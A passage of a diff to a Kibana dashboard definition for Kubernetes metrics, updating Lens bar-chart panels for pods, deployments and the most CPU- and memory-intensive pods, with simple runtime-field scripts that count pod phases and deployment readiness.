"866856c3-c189-4457-9240-ab6a9d2df75d" + ], + "collapseFn": "sum", + "layerId": "b7b25285-ced1-481d-999e-1886b3463594", + 
"layerType": "data", + "position": "top", + "seriesType": "bar_horizontal", + "showGridlines": false, + "splitAccessor": "3d69345e-fb52-485a-8762-fdfaf09ea013", + "xAccessor": "1699b42c-8ab5-43dc-a722-6d70911eae94", + "yConfig": [ + { + "color": "#bd271e", + "forAccessor": "866856c3-c189-4457-9240-ab6a9d2df75d" + }, + { + "color": "#fec514", + "forAccessor": "1df45e80-f287-4f85-9f8e-6efaddff0f77" + }, + { + "color": "#00bfb3", + "forAccessor": "1c9e34cf-591d-4a4f-9999-67e95918e933" + }, + { + "color": "#0077cc", + "forAccessor": "92280dfe-0252-4993-9c5d-28764c18bc13" + } + ] + } + ], + "legend": { + "horizontalAlignment": "right", + "isInside": false, + "isVisible": false, + "maxLines": 1, + "position": "bottom", + "shouldTruncate": true, + "showSingleSeries": false, + "verticalAlignment": "bottom" + }, + "preferredSeriesType": "bar_horizontal", + "tickLabelsVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true + }, + "title": "Empty XY chart", + "valueLabels": "show", + "valuesInLegend": true, + "xTitle": "", + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [], - "state": { - "adHocDataViews": { - "0b9c02fc-3c21-47e2-abed-31cbc41b11cc": { - "allowNoIndex": false, - "fieldAttrs": {}, - "fieldFormats": {}, - "id": "0b9c02fc-3c21-47e2-abed-31cbc41b11cc", - "name": "state_deployment-ad-hoc", - "runtimeFieldMap": { - "not_ready": { - "script": { - "source": "if (doc[\"kubernetes.deployment.replicas.desired\"].value - doc[\"kubernetes.deployment.replicas.available\"].value != 0) { emit(1) }" - }, - "type": "long" - }, - "ready": { - "script": { - "source": "if (doc[\"kubernetes.deployment.replicas.desired\"].value - doc[\"kubernetes.deployment.replicas.available\"].value == 0) { emit(1) }" - }, - "type": "long" - } - }, - "sourceFilters": [], - "timeFieldName": "@timestamp", - "title": "metrics-*,*:metrics-*" - }, - "0fa53a1e-0589-4380-b700-70dd489a33de": { - "allowNoIndex": false, - "fieldAttrs": {}, - 
"fieldFormats": {}, - "id": "0fa53a1e-0589-4380-b700-70dd489a33de", - "name": "state-pods-adhoc", - "runtimeFieldMap": { - "failed": { - "script": { - "source": "if (doc['kubernetes.pod.status.phase'].value == \"failed\") { emit(1) }" - }, - "type": "long" - }, - "not_running": { - "script": { - "source": "if (doc['kubernetes.pod.status.phase'].value == \"pending\" || doc['kubernetes.pod.status.phase'].value == \"failed\") { emit(1) }" - }, - "type": "long" - }, - "pending": { - "script": { - "source": "if (doc['kubernetes.pod.status.phase'].value == \"pending\") { emit(1) }" - }, - "type": "long" - }, - "running": { - "script": { - "source": "if (doc['kubernetes.pod.status.phase'].value == \"running\") { emit(1) }" - }, - "type": "long" - }, - "succeeded": { - "script": { - "source": "if (doc['kubernetes.pod.status.phase'].value == \"succeeded\") { emit(1) }" - }, - "type": "long" - } - }, - "sourceFilters": [], - "timeFieldName": "@timestamp", - "title": "metrics-*,*:metrics-*" - }, - "34c15200-5232-4a16-8fb0-36ca5a194638": { - "allowNoIndex": false, - "fieldAttrs": {}, - "fieldFormats": {}, - "id": "34c15200-5232-4a16-8fb0-36ca5a194638", - "name": "deployments-ad-hoc", - "runtimeFieldMap": { - "not_running": { - "script": { - "source": "if (doc['kubernetes.deployment.paused'].value == true) { emit(1) }" - }, - "type": "long" - }, - "running": { - "script": { - "source": "if (doc['kubernetes.deployment.paused'].value == false) { emit(1) }" - }, - "type": "long" - } - }, - "sourceFilters": [], - "timeFieldName": "@timestamp", - "title": "metrics-*,*:metrics-*" - }, - "f8fa576a-6f91-4a11-a43d-7f3964869d7d": { - "allowNoIndex": false, - "fieldAttrs": {}, - "fieldFormats": {}, - "id": "f8fa576a-6f91-4a11-a43d-7f3964869d7d", - "name": "daemonsets-ad-hoc", - "runtimeFieldMap": {}, - "sourceFilters": [], - "timeFieldName": "@timestamp", - "title": "metrics-*,*:metrics-*" - } - }, - "datasourceStates": { - "formBased": { - "layers": { - 
"b7b25285-ced1-481d-999e-1886b3463594": { - "columnOrder": [ - "6690f3c6-3a05-47e0-8f98-5baea37f351c", - "2b790ab1-6a55-4c4c-9131-964752309c72", - "143fa2b5-a63f-4d51-9207-f6e3441dd124", - "16807879-5684-4aab-9b80-cc701f820e68" - ], - "columns": { - "143fa2b5-a63f-4d51-9207-f6e3441dd124": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "ready: *" - }, - "isBucketed": false, - "label": "Ready", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "reducedTimeRange": "1m", - "scale": "ratio", - "sourceField": "ready" - }, - "16807879-5684-4aab-9b80-cc701f820e68": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "not_ready: *" - }, - "isBucketed": false, - "label": "Not Ready", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "reducedTimeRange": "1m", - "scale": "ratio", - "sourceField": "not_ready" - }, - "2b790ab1-6a55-4c4c-9131-964752309c72": { - "dataType": "string", - "isBucketed": true, - "label": "Filters", - "operationType": "filters", - "params": { - "filters": [ - { - "input": { - "language": "kuery", - "query": "" - }, - "label": "Status" - } - ] - }, - "scale": "ordinal" - }, - "6690f3c6-3a05-47e0-8f98-5baea37f351c": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10000 values of kubernetes.deployment.name", - "operationType": "terms", - "params": { - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": false, - "missingBucket": false, - "orderBy": { - "columnId": "143fa2b5-a63f-4d51-9207-f6e3441dd124", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 10000 - }, - "scale": "ordinal", - "sourceField": "kubernetes.deployment.name" - } - }, - "incompleteColumns": {} - } - } - } - }, + "title": "Total Pods per Namespace [Metrics Kubernetes] (copy 1)", + "type": "lens", + 
"visualizationType": "lnsXY" + }, + "enhancements": { + "dynamicActions": { + "events": [] + } + }, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Pods" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 6, + "i": "9543898d-c036-4680-b122-45fe721c0226", + "w": 10, + "x": 18, + "y": 13 + }, + "panelIndex": "9543898d-c036-4680-b122-45fe721c0226", + "embeddableConfig": { + "attributes": { + "references": [], + "state": { + "adHocDataViews": { + "0b9c02fc-3c21-47e2-abed-31cbc41b11cc": { + "allowNoIndex": false, + "fieldAttrs": {}, + "fieldFormats": {}, + "id": "0b9c02fc-3c21-47e2-abed-31cbc41b11cc", + "name": "state_deployment-ad-hoc", + "runtimeFieldMap": { + "not_ready": { + "script": { + "source": "if (doc[\"kubernetes.deployment.replicas.desired\"].value - doc[\"kubernetes.deployment.replicas.available\"].value != 0) { emit(1) }" + }, + "type": "long" + }, + "ready": { + "script": { + "source": "if (doc[\"kubernetes.deployment.replicas.desired\"].value - doc[\"kubernetes.deployment.replicas.available\"].value == 0) { emit(1) }" + }, + "type": "long" + } + }, + "sourceFilters": [], + "timeFieldName": "@timestamp", + "title": "metrics-*,*:metrics-*" + }, + "0fa53a1e-0589-4380-b700-70dd489a33de": { + "allowNoIndex": false, + "fieldAttrs": {}, + "fieldFormats": {}, + "id": "0fa53a1e-0589-4380-b700-70dd489a33de", + "name": "state-pods-adhoc", + "runtimeFieldMap": { + "failed": { + "script": { + "source": "if (doc['kubernetes.pod.status.phase'].value == \"failed\") { emit(1) }" + }, + "type": "long" + }, + "not_running": { + "script": { + "source": "if (doc['kubernetes.pod.status.phase'].value == \"pending\" || doc['kubernetes.pod.status.phase'].value == \"failed\") { emit(1) }" + }, + "type": "long" + }, + "pending": { + "script": { + "source": "if (doc['kubernetes.pod.status.phase'].value == \"pending\") { emit(1) }" + }, + "type": "long" + }, + "running": { + "script": { + "source": "if (doc['kubernetes.pod.status.phase'].value == 
\"running\") { emit(1) }" + }, + "type": "long" + }, + "succeeded": { + "script": { + "source": "if (doc['kubernetes.pod.status.phase'].value == \"succeeded\") { emit(1) }" + }, + "type": "long" + } + }, + "sourceFilters": [], + "timeFieldName": "@timestamp", + "title": "metrics-*,*:metrics-*" + }, + "34c15200-5232-4a16-8fb0-36ca5a194638": { + "allowNoIndex": false, + "fieldAttrs": {}, + "fieldFormats": {}, + "id": "34c15200-5232-4a16-8fb0-36ca5a194638", + "name": "deployments-ad-hoc", + "runtimeFieldMap": { + "not_running": { + "script": { + "source": "if (doc['kubernetes.deployment.paused'].value == true) { emit(1) }" + }, + "type": "long" + }, + "running": { + "script": { + "source": "if (doc['kubernetes.deployment.paused'].value == false) { emit(1) }" + }, + "type": "long" + } + }, + "sourceFilters": [], + "timeFieldName": "@timestamp", + "title": "metrics-*,*:metrics-*" + }, + "f8fa576a-6f91-4a11-a43d-7f3964869d7d": { + "allowNoIndex": false, + "fieldAttrs": {}, + "fieldFormats": {}, + "id": "f8fa576a-6f91-4a11-a43d-7f3964869d7d", + "name": "daemonsets-ad-hoc", + "runtimeFieldMap": {}, + "sourceFilters": [], + "timeFieldName": "@timestamp", + "title": "metrics-*,*:metrics-*" + } + }, + "datasourceStates": { + "formBased": { + "layers": { + "b7b25285-ced1-481d-999e-1886b3463594": { + "columnOrder": [ + "6690f3c6-3a05-47e0-8f98-5baea37f351c", + "2b790ab1-6a55-4c4c-9131-964752309c72", + "143fa2b5-a63f-4d51-9207-f6e3441dd124", + "16807879-5684-4aab-9b80-cc701f820e68" + ], + "columns": { + "143fa2b5-a63f-4d51-9207-f6e3441dd124": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "ready: *" + }, + "isBucketed": false, + "label": "Ready", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "reducedTimeRange": "1m", + "scale": "ratio", + "sourceField": "ready" + }, + "16807879-5684-4aab-9b80-cc701f820e68": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + 
"query": "not_ready: *" + }, + "isBucketed": false, + "label": "Not Ready", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "reducedTimeRange": "1m", + "scale": "ratio", + "sourceField": "not_ready" + }, + "2b790ab1-6a55-4c4c-9131-964752309c72": { + "dataType": "string", + "isBucketed": true, + "label": "Filters", + "operationType": "filters", + "params": { "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "0b9c02fc-3c21-47e2-abed-31cbc41b11cc", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.state_deployment" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.state_deployment" - } - } - } - ], - "internalReferences": [ - { - "id": "0b9c02fc-3c21-47e2-abed-31cbc41b11cc", - "name": "indexpattern-datasource-layer-b7b25285-ced1-481d-999e-1886b3463594", - "type": "index-pattern" - } - ], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "gridlinesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "layers": [ - { - "accessors": [ - "143fa2b5-a63f-4d51-9207-f6e3441dd124", - "16807879-5684-4aab-9b80-cc701f820e68" - ], - "collapseFn": "sum", - "layerId": "b7b25285-ced1-481d-999e-1886b3463594", - "layerType": "data", - "position": "top", - "seriesType": "bar_horizontal", - "showGridlines": false, - "splitAccessor": "6690f3c6-3a05-47e0-8f98-5baea37f351c", - "xAccessor": "2b790ab1-6a55-4c4c-9131-964752309c72", - "yConfig": [ - { - "color": "#bd271e", - "forAccessor": "16807879-5684-4aab-9b80-cc701f820e68" - }, - { - "color": "#00bfb3", - "forAccessor": "143fa2b5-a63f-4d51-9207-f6e3441dd124" - } - ] - } - ], - "legend": { - "isVisible": false, - "position": "right", - "showSingleSeries": false - }, - "preferredSeriesType": "bar_horizontal", - 
"tickLabelsVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "title": "Empty XY chart", - "valueLabels": "show", - "xTitle": "", - "yTitle": "" - } + { + "input": { + "language": "kuery", + "query": "" + }, + "label": "Status" + } + ] + }, + "scale": "ordinal" }, - "title": "Total Pods per Namespace [Metrics Kubernetes] (copy 1)", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": { - "dynamicActions": { - "events": [] + "6690f3c6-3a05-47e0-8f98-5baea37f351c": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10000 values of kubernetes.deployment.name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "143fa2b5-a63f-4d51-9207-f6e3441dd124", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 10000 + }, + "scale": "ordinal", + "sourceField": "kubernetes.deployment.name" } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "0b9c02fc-3c21-47e2-abed-31cbc41b11cc", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.state_deployment" }, - "hidePanelTitles": false - }, - "gridData": { - "h": 6, - "i": "9543898d-c036-4680-b122-45fe721c0226", - "w": 10, - "x": 18, - "y": 13 - }, - "panelIndex": "9543898d-c036-4680-b122-45fe721c0226", - "title": "Deployments", - "type": "lens", - "version": "8.6.0-SNAPSHOT" + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.state_deployment" + } + } + } + ], + "internalReferences": [ + { + "id": "0b9c02fc-3c21-47e2-abed-31cbc41b11cc", + "name": "indexpattern-datasource-layer-b7b25285-ced1-481d-999e-1886b3463594", + "type": "index-pattern" + } + ], + "query": { + "language": 
"kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true + }, + "gridlinesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true + }, + "layers": [ + { + "accessors": [ + "143fa2b5-a63f-4d51-9207-f6e3441dd124", + "16807879-5684-4aab-9b80-cc701f820e68" + ], + "collapseFn": "sum", + "layerId": "b7b25285-ced1-481d-999e-1886b3463594", + "layerType": "data", + "position": "top", + "seriesType": "bar_horizontal", + "showGridlines": false, + "splitAccessor": "6690f3c6-3a05-47e0-8f98-5baea37f351c", + "xAccessor": "2b790ab1-6a55-4c4c-9131-964752309c72", + "yConfig": [ + { + "color": "#bd271e", + "forAccessor": "16807879-5684-4aab-9b80-cc701f820e68" + }, + { + "color": "#00bfb3", + "forAccessor": "143fa2b5-a63f-4d51-9207-f6e3441dd124" + } + ] + } + ], + "legend": { + "isVisible": false, + "position": "right", + "showSingleSeries": false + }, + "preferredSeriesType": "bar_horizontal", + "tickLabelsVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true + }, + "title": "Empty XY chart", + "valueLabels": "show", + "xTitle": "", + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-06a776d4-f25a-45c0-a54e-82d0cb913047", - "type": "index-pattern" + "title": "Total Pods per Namespace [Metrics Kubernetes] (copy 1)", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": { + "dynamicActions": { + "events": [] + } + }, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Deployments" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 11, + "i": "14ceb02d-63b6-448a-85fe-28a9e974e80c", + "w": 24, + "x": 0, + "y": 19 + }, + "panelIndex": "14ceb02d-63b6-448a-85fe-28a9e974e80c", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": 
"indexpattern-datasource-layer-06a776d4-f25a-45c0-a54e-82d0cb913047", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "a06a30d5-05f1-46ea-9075-3e6051f5781a", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "9c0b0d2f-c443-4c41-b55c-c7ad0db60302", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "06a776d4-f25a-45c0-a54e-82d0cb913047": { + "columnOrder": [ + "f4242bda-ae9c-4d7c-8cda-43f56c38acb5", + "d954ad9d-4fc7-44d3-8fe9-eecae0d8302c" + ], + "columns": { + "d954ad9d-4fc7-44d3-8fe9-eecae0d8302c": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.pod.cpu.usage.limit.pct: *" + }, + "isBucketed": false, + "label": "Average Pod CPU Usage ", + "operationType": "last_value", + "params": { + "format": { + "id": "percent", + "params": { + "decimals": 2 + } }, - { - "id": "metrics-*", - "name": "a06a30d5-05f1-46ea-9075-3e6051f5781a", - "type": "index-pattern" + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.pod.cpu.usage.limit.pct" + }, + "f4242bda-ae9c-4d7c-8cda-43f56c38acb5": { + "dataType": "string", + "isBucketed": true, + "label": "Top 5 values of kubernetes.pod.name", + "operationType": "terms", + "params": { + "accuracyMode": true, + "missingBucket": false, + "orderBy": { + "columnId": "d954ad9d-4fc7-44d3-8fe9-eecae0d8302c", + "type": "column" }, - { - "id": "metrics-*", - "name": "9c0b0d2f-c443-4c41-b55c-c7ad0db60302", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "06a776d4-f25a-45c0-a54e-82d0cb913047": { - "columnOrder": [ - "f4242bda-ae9c-4d7c-8cda-43f56c38acb5", - "d954ad9d-4fc7-44d3-8fe9-eecae0d8302c" - ], - "columns": { - "d954ad9d-4fc7-44d3-8fe9-eecae0d8302c": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": 
"kubernetes.pod.cpu.usage.limit.pct: *" - }, - "isBucketed": false, - "label": "Average Pod CPU Usage ", - "operationType": "last_value", - "params": { - "format": { - "id": "percent", - "params": { - "decimals": 2 - } - }, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.pod.cpu.usage.limit.pct" - }, - "f4242bda-ae9c-4d7c-8cda-43f56c38acb5": { - "dataType": "string", - "isBucketed": true, - "label": "Top 5 values of kubernetes.pod.name", - "operationType": "terms", - "params": { - "accuracyMode": true, - "missingBucket": false, - "orderBy": { - "columnId": "d954ad9d-4fc7-44d3-8fe9-eecae0d8302c", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "size": 5 - }, - "scale": "ordinal", - "sourceField": "kubernetes.pod.name" - } - }, - "incompleteColumns": {} - } - } - } + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "a06a30d5-05f1-46ea-9075-3e6051f5781a", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.pod" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.pod" - } - } - }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "9c0b0d2f-c443-4c41-b55c-c7ad0db60302", - "key": "kubernetes.pod.cpu.usage.limit.pct", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "kubernetes.pod.cpu.usage.limit.pct" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - 
}, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "d954ad9d-4fc7-44d3-8fe9-eecae0d8302c" - ], - "layerId": "06a776d4-f25a-45c0-a54e-82d0cb913047", - "layerType": "data", - "seriesType": "bar_horizontal", - "xAccessor": "f4242bda-ae9c-4d7c-8cda-43f56c38acb5", - "yConfig": [ - { - "color": "#00bfb3", - "forAccessor": "d954ad9d-4fc7-44d3-8fe9-eecae0d8302c" - } - ] - } - ], - "legend": { - "isVisible": false, - "position": "right", - "showSingleSeries": false - }, - "preferredSeriesType": "bar_horizontal", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": false, - "yRight": true - }, - "valueLabels": "show", - "xTitle": "", - "yTitle": "" - } - }, - "title": "Cpu Usage per Namespace [Metrics Kubernetes]", - "type": "lens", - "visualizationType": "lnsXY" + "size": 5 + }, + "scale": "ordinal", + "sourceField": "kubernetes.pod.name" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "a06a30d5-05f1-46ea-9075-3e6051f5781a", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.pod" }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 11, - "i": "14ceb02d-63b6-448a-85fe-28a9e974e80c", - "w": 24, - "x": 0, - "y": 19 - }, - "panelIndex": "14ceb02d-63b6-448a-85fe-28a9e974e80c", - "title": "Top CPU intensive pods", - "type": "lens", - "version": "8.6.0-SNAPSHOT" + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.pod" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "9c0b0d2f-c443-4c41-b55c-c7ad0db60302", + "key": "kubernetes.pod.cpu.usage.limit.pct", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "kubernetes.pod.cpu.usage.limit.pct" + } + } + } + ], + 
"internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "d954ad9d-4fc7-44d3-8fe9-eecae0d8302c" + ], + "layerId": "06a776d4-f25a-45c0-a54e-82d0cb913047", + "layerType": "data", + "seriesType": "bar_horizontal", + "xAccessor": "f4242bda-ae9c-4d7c-8cda-43f56c38acb5", + "yConfig": [ + { + "color": "#00bfb3", + "forAccessor": "d954ad9d-4fc7-44d3-8fe9-eecae0d8302c" + } + ] + } + ], + "legend": { + "isVisible": false, + "position": "right", + "showSingleSeries": false + }, + "preferredSeriesType": "bar_horizontal", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true + }, + "valueLabels": "show", + "xTitle": "", + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-06a776d4-f25a-45c0-a54e-82d0cb913047", - "type": "index-pattern" + "title": "Cpu Usage per Namespace [Metrics Kubernetes]", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Top CPU intensive pods" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 11, + "i": "783789d4-8473-40f5-acf0-7ae5c850cd3e", + "w": 24, + "x": 24, + "y": 19 + }, + "panelIndex": "783789d4-8473-40f5-acf0-7ae5c850cd3e", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-06a776d4-f25a-45c0-a54e-82d0cb913047", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "8769bfd6-a9c7-4bab-b048-0e2fcffe8114", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": 
"d79e5279-bd92-48b0-bd92-767cf6b8892d", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "06a776d4-f25a-45c0-a54e-82d0cb913047": { + "columnOrder": [ + "f4242bda-ae9c-4d7c-8cda-43f56c38acb5", + "d954ad9d-4fc7-44d3-8fe9-eecae0d8302c" + ], + "columns": { + "d954ad9d-4fc7-44d3-8fe9-eecae0d8302c": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.pod.memory.usage.limit.pct: *" + }, + "isBucketed": false, + "label": "Average Pod memory Usage ", + "operationType": "last_value", + "params": { + "format": { + "id": "percent", + "params": { + "decimals": 2 + } }, - { - "id": "metrics-*", - "name": "8769bfd6-a9c7-4bab-b048-0e2fcffe8114", - "type": "index-pattern" + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.pod.memory.usage.limit.pct" + }, + "f4242bda-ae9c-4d7c-8cda-43f56c38acb5": { + "dataType": "string", + "isBucketed": true, + "label": "Top 5 values of kubernetes.pod.name", + "operationType": "terms", + "params": { + "accuracyMode": true, + "missingBucket": false, + "orderBy": { + "columnId": "d954ad9d-4fc7-44d3-8fe9-eecae0d8302c", + "type": "column" }, - { - "id": "metrics-*", - "name": "d79e5279-bd92-48b0-bd92-767cf6b8892d", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "06a776d4-f25a-45c0-a54e-82d0cb913047": { - "columnOrder": [ - "f4242bda-ae9c-4d7c-8cda-43f56c38acb5", - "d954ad9d-4fc7-44d3-8fe9-eecae0d8302c" - ], - "columns": { - "d954ad9d-4fc7-44d3-8fe9-eecae0d8302c": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.pod.memory.usage.limit.pct: *" - }, - "isBucketed": false, - "label": "Average Pod memory Usage ", - "operationType": "last_value", - "params": { - "format": { - "id": "percent", - "params": { - "decimals": 2 - } - }, - "sortField": 
"@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.pod.memory.usage.limit.pct" - }, - "f4242bda-ae9c-4d7c-8cda-43f56c38acb5": { - "dataType": "string", - "isBucketed": true, - "label": "Top 5 values of kubernetes.pod.name", - "operationType": "terms", - "params": { - "accuracyMode": true, - "missingBucket": false, - "orderBy": { - "columnId": "d954ad9d-4fc7-44d3-8fe9-eecae0d8302c", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "size": 5 - }, - "scale": "ordinal", - "sourceField": "kubernetes.pod.name" - } - }, - "incompleteColumns": {} - } - } - } + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "8769bfd6-a9c7-4bab-b048-0e2fcffe8114", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.pod" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.pod" - } - } - }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "d79e5279-bd92-48b0-bd92-767cf6b8892d", - "key": "kubernetes.pod.memory.usage.limit.pct", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "kubernetes.pod.memory.usage.limit.pct" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "d954ad9d-4fc7-44d3-8fe9-eecae0d8302c" - ], - "layerId": "06a776d4-f25a-45c0-a54e-82d0cb913047", - "layerType": "data", - 
"seriesType": "bar_horizontal", - "xAccessor": "f4242bda-ae9c-4d7c-8cda-43f56c38acb5", - "yConfig": [ - { - "color": "#00bfb3", - "forAccessor": "d954ad9d-4fc7-44d3-8fe9-eecae0d8302c" - } - ] - } - ], - "legend": { - "isVisible": false, - "position": "right", - "showSingleSeries": false - }, - "preferredSeriesType": "bar_horizontal", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": false, - "yRight": true - }, - "valueLabels": "show", - "xTitle": "", - "yTitle": "" - } - }, - "title": "Cpu Usage per Namespace [Metrics Kubernetes]", - "type": "lens", - "visualizationType": "lnsXY" + "size": 5 + }, + "scale": "ordinal", + "sourceField": "kubernetes.pod.name" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "8769bfd6-a9c7-4bab-b048-0e2fcffe8114", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.pod" }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 11, - "i": "783789d4-8473-40f5-acf0-7ae5c850cd3e", - "w": 24, - "x": 24, - "y": 19 - }, - "panelIndex": "783789d4-8473-40f5-acf0-7ae5c850cd3e", - "title": "Top memory intensive pods", - "type": "lens", - "version": "8.6.0-SNAPSHOT" + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.pod" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "d79e5279-bd92-48b0-bd92-767cf6b8892d", + "key": "kubernetes.pod.memory.usage.limit.pct", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": 